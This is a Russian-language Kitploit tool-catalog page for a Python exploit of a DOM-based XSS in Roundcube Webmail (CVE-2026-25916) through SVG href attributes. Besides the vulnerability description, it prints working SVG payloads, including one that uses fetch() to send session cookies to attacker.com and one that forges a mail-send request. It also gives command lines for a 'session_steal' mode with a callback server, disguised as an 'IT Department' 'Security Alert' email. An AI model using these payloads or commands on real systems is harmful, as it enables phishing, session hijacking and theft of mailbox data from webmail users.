Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute — Python-эксплойт для DOM-based XSS в Roundcube Webmail (CVE-2026-25916) через атрибуты href в SVG, позволяющий перехват сессии и эксфильтрацию данных с помощью специально сформированных писем. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьБезопасность Электронной Почты
GitHubmbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute

CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute

Python-эксплойт для DOM-based XSS в Roundcube Webmail (CVE-2026-25916) через атрибуты href в SVG, позволяющий перехват сессии и эксфильтрацию данных с помощью специально сформированных писем.

Репозиторий
31107 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-25916: Эксплойт DOM XSS в Roundcube Webmail

📋 Информация об эксплойте

Название эксплойта: DOM XSS в Roundcube Webmail через SVG href (CVE-2026-25916)
Автор: Mohammed Idrees Banyamer
Контакты: GitHub @mbanyamer | Instagram @banyamer_security
Страна: Иордания
Дата: 9 февраля 2026 года
CVE: CVE-2026-25916
Тип: DOM-based Cross-Site Scripting (XSS)
Платформа: Веб-приложение
Протестировано на: Roundcube 1.6.8, Ubuntu 22.04
Оценка CVSS: 6.1 (Средний)

🚨 Правовое предупреждение

⚠️ ВНИМАНИЕ: Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования.
Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
Автор не несёт ответственности за любое неправомерное использование или незаконные действия.

📖 Описание уязвимости

Версии Roundcube Webmail до 1.6.9 содержат DOM-based XSS уязвимость в обработке SVG. Приложение не выполняет надлежащую санитизацию атрибутов и в SVG-элементах, что позволяет выполнять JavaScript через специально созданные электронные письма.

href
xlink:href

Затронутые версии: Roundcube Webmail < 1.6.9
Исправлено в: Версия 1.6.9 (коммит 26d7677)
CWE: CWE-79 — Некорректная нейтрализация входных данных при генерации веб-страницы
Вектор атаки: Удалённо через электронную почту
Воздействие: Перехват сессии, захват учётной записи, кража данных

🔧 Технические детали

Уязвимость существует в rcube_washtml.php, где атрибуты href в SVG-элементах не проверялись должным образом:

root@kitploit:~
<!-- Уязвимые SVG-элементы -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
root@kitploit:~
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u [email protected] \
  -w app_password \
  -r [email protected] \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
Скачать инструмент